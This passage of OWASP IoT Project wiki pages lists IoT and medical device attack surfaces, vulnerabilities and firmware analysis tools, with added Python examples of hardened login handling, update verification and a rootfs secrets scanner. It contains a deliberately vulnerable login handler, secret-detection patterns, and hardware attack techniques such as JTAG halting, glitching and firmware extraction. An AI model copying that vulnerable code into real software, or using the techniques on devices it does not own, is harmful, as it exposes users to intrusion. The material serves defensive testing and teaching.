** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the attacks known against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reuse of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physically)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to trivial values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is misconfigured or not kept up to date, e.g. the service still accepts SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* The storage location for update files is world-writable, potentially allowing an attacker to modify the firmware that is then distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A network service can be attacked in a way that makes that service, or the entire device, unavailable<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With a JTAG adapter and gdb an attacker can halt the CPU, alter registers and memory, and change the firmware's execution flow to bypass almost all software-based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, an attacker can often obtain full console access to the device<br />
* Common countermeasures are custom bootloaders that prevent entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH daemons, web servers, etc.<br />
|-<br />
<br />
|}<br />
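The first three credential rows in the table above (username enumeration, weak passwords, account lockout) are usually symptoms of one login handler. The block below is an added example, not code from the OWASP project: a deliberately vulnerable handler whose distinct error messages and unlimited attempts show all three problems, beside a hardened version with a single failure message, constant-time comparison, equal work for unknown users, a password policy and a lockout. The user store, the `WEAK_PASSWORDS` list and the lockout thresholds are assumed values for illustration.<br />

```python
import hashlib
import hmac
import os
import time

PBKDF2_ROUNDS = 100_000          # assumed; tune to the device's CPU budget
MAX_FAILURES = 5                 # the page's "3 - 5 failed login attempts"
LOCKOUT_SECONDS = 300            # assumed lockout window
# Values the device must never accept: the page's '1234' / '123456' plus common defaults.
WEAK_PASSWORDS = {"1234", "123456", "password", "admin"}


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def make_store(users):
    """Constructed user store: {username: (salt, pbkdf2_hash)}; a device keeps this in flash."""
    store = {}
    for name, password in users.items():
        salt = os.urandom(16)
        store[name] = (salt, _hash(password, salt))
    return store


def login_vulnerable(store, username, password):
    """Vulnerable: the two failure messages tell an attacker which usernames exist,
    and nothing stops them from trying passwords forever."""
    if username not in store:
        return (False, "unknown user")
    salt, digest = store[username]
    if _hash(password, salt) != digest:
        return (False, "wrong password")
    return (True, "ok")


class Authenticator:
    """Hardened: one failure message, constant-time compare, the same hashing cost
    for unknown users, a password policy, and a lockout after MAX_FAILURES attempts."""

    def __init__(self, store, now=time.monotonic):
        self.store = store
        self.now = now                       # injectable clock so tests can advance time
        self.failures = {}                   # username -> (count, locked_until)
        dummy_salt = b"\0" * 16              # unknown users are hashed against this entry
        self._dummy = (dummy_salt, _hash("dummy", dummy_salt))

    def set_password(self, username, password):
        if len(password) < 8 or password.lower() in WEAK_PASSWORDS:
            raise ValueError("password rejected by policy")
        salt = os.urandom(16)
        self.store[username] = (salt, _hash(password, salt))

    def login(self, username, password):
        count, locked_until = self.failures.get(username, (0, 0.0))
        if locked_until:
            if self.now() < locked_until:
                return (False, "authentication failed")   # still locked; do not even hash
            count, locked_until = 0, 0.0                   # lock expired: start a fresh count
        salt, digest = self.store.get(username, self._dummy)
        ok = hmac.compare_digest(_hash(password, salt), digest) and username in self.store
        if ok:
            self.failures.pop(username, None)
            return (True, "ok")
        count += 1
        if count >= MAX_FAILURES:
            locked_until = self.now() + LOCKOUT_SECONDS
        self.failures[username] = (count, locked_until)
        return (False, "authentication failed")
```

Keying the lockout on the username alone lets a remote attacker lock out the administrator; real devices pair it with a per-source rate limit or an escalating delay, and cap the size of the `failures` map so a flood of unknown usernames cannot exhaust memory. The short deny-list is a floor, not a policy: the initial-setup flow should also force the factory default to be changed.<br />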
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key (shared across devices or never rotated)<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
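The Update Mechanism row above, together with the firmware downgrade, payload verification and message integrity items, describes what an installer must check before a single byte of an image is written to flash. The block below is an added example, not code from the OWASP project or any vendor, showing those checks in the order that matters: authenticate the manifest, confirm the product and the anti-rollback version, then bind the image to the manifest by length and SHA-256. The manifest layout, version numbering and product name are assumptions. The HMAC used as the signature is a stand-in so the block runs with the standard library only; on a real device it is itself a weakness, as the note after the code explains.<br />

```python
import hashlib
import hmac
import json


class UpdateRejected(Exception):
    """Raised before anything is written; the caller logs it and keeps the running image."""


# Stand-in signing primitive so the example is self-contained. A real device verifies
# an asymmetric signature (e.g. Ed25519) against a public key in read-only storage;
# a symmetric key like this one can be recovered by firmware extraction.
def sign_manifest(key, manifest_bytes):
    return hmac.new(key, manifest_bytes, hashlib.sha256).hexdigest()


def make_verifier(key):
    def verify(manifest_bytes, signature):
        return hmac.compare_digest(sign_manifest(key, manifest_bytes), signature)
    return verify


def verify_update(package, installed_version, verify_sig, product="widget-2000"):
    """package = {"manifest": bytes, "signature": str, "image": bytes}.
    Returns the new version number, or raises UpdateRejected. Versions are
    monotonically increasing build numbers (assumed)."""
    manifest_bytes = package["manifest"]
    # 1. Authenticate the manifest first; nothing inside it is trusted until then.
    if not verify_sig(manifest_bytes, package["signature"]):
        raise UpdateRejected("manifest signature invalid")
    manifest = json.loads(manifest_bytes)
    # 2. A valid signature for another SKU must not install here.
    if manifest.get("product") != product:
        raise UpdateRejected("manifest is for a different product")
    # 3. Anti-rollback: never install a version at or below the running one.
    if manifest["version"] <= installed_version:
        raise UpdateRejected("rollback to version %s refused" % manifest["version"])
    # 4. Bind the image to the signed manifest through its length and digest.
    image = package["image"]
    if len(image) != manifest["size"]:
        raise UpdateRejected("image size mismatch")
    if not hmac.compare_digest(hashlib.sha256(image).hexdigest(), manifest["sha256"]):
        raise UpdateRejected("image digest mismatch")
    return manifest["version"]


def build_package(key, product, version, image):
    """What the vendor's signing service produces (constructed for the example)."""
    manifest = json.dumps({"product": product, "version": version, "size": len(image),
                           "sha256": hashlib.sha256(image).hexdigest()},
                          sort_keys=True).encode()
    return {"manifest": manifest, "signature": sign_manifest(key, manifest), "image": image}
```

The checks run in this order on purpose: nothing in the manifest is trusted before its signature is verified, and the image is never parsed before its digest matches. On a real device replace `make_verifier` with an asymmetric check (Ed25519 or RSA-PSS) against a public key in read-only storage, keep the signing key off the device entirely, and store the installed version in tamper-resistant storage so the anti-rollback check cannot be reset by the same attacker who supplies the old image. Transport encryption (TLS) on the download is still needed for confidentiality, but it does not replace any of these checks.<br />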
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to understand the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! Contents<br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
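File system analysis, the last item under Device Firmware Guidance and Instruction above, is mostly a search of the extracted root filesystem for the artifacts listed under Device Firmware Vulnerabilities: hard-coded credentials, private keys, backdoor accounts and writable update locations. The block below is an added example, not the code of Firmwalker or any other tool listed above, that walks an extracted rootfs and reports those artifacts; `build_sample_rootfs()` writes a constructed, deliberately flawed tree into a temporary directory so the scan runs offline. The patterns are a starting set, not an exhaustive list.<br />

```python
import os
import re
import stat
import tempfile

# Byte regexes so the scan works on binaries as well as text files.
SECRET_PATTERNS = [
    ("private key material", re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")),
    ("hard-coded credential", re.compile(rb"(?i)\b(?:passw(?:or)?d|secret|api[_-]?key)\s*[=:]\s*\S+")),
    ("embedded URL", re.compile(rb"https?://[^\s\"'<>]+")),
]
PASSWD_LINE = re.compile(rb"^([^:\n]+):([^:\n]*):")
LOCKED_FIELDS = (b"x", b"*", b"!", b"!!")
MAX_READ = 1 << 20   # bytes scanned per file; enough for configs and small binaries


def _check_account_file(rel, path):
    """Flag accounts with an empty password field (login without a password) or with a
    hash stored inline (extractable, and usually identical on every unit shipped)."""
    out = []
    with open(path, "rb") as f:
        for line in f:
            m = PASSWD_LINE.match(line)
            if not m:
                continue
            user, field = m.group(1).decode("latin-1"), m.group(2)
            if field == b"":
                out.append(("empty password", rel, user))
            elif field not in LOCKED_FIELDS and not field.startswith(b"!"):
                out.append(("password hash present", rel, user))
    return out


def scan_rootfs(root):
    """Return a list of (finding, relative_path, detail) for an extracted rootfs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        # A directory anyone can write to under /tmp or /etc lets an unprivileged process
        # on the device swap in its own image or config ("Update location writable").
        if rel_dir != "." and os.lstat(dirpath).st_mode & stat.S_IWOTH:
            findings.append(("world-writable directory", rel_dir, ""))
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            rel = os.path.relpath(path, root)
            if rel in ("etc/passwd", "etc/shadow"):
                findings.extend(_check_account_file(rel, path))
                continue
            with open(path, "rb") as f:
                data = f.read(MAX_READ)
            for label, pattern in SECRET_PATTERNS:
                m = pattern.search(data)
                if m:
                    findings.append((label, rel, m.group(0)[:60].decode("latin-1")))
    return findings


def build_sample_rootfs():
    """Write a constructed, deliberately flawed rootfs to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="rootfs-")
    files = {
        "etc/shadow": b"root:$1$abc$deadbeef:17000:0:99999:7:::\n"
                      b"admin::17000:0:99999:7:::\n"
                      b"daemon:*:17000:0:99999:7:::\n",
        "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\nadmin:x:1000:1000::/home/admin:/bin/sh\n",
        "etc/ssl/device.key": b"-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n-----END RSA PRIVATE KEY-----\n",
        "etc/cloud.conf": b"endpoint=https://updates.example.invalid/v1\napi_key = 0123456789abcdef\n",
        "tmp/updates/.keep": b"",
    }
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    os.chmod(os.path.join(root, "tmp", "updates"), 0o777)   # the writable update location
    return root
```

Treat the output as leads rather than verdicts: a hash in `etc/shadow` becomes a finding once it cracks or turns out to be identical across images, and an embedded URL matters when it points at an update server or an undocumented API. Run the scan on the output of `binwalk -e`, and add a certificate parser to catch the expired or shared certificates listed above, which a regex cannot judge.<br />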
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
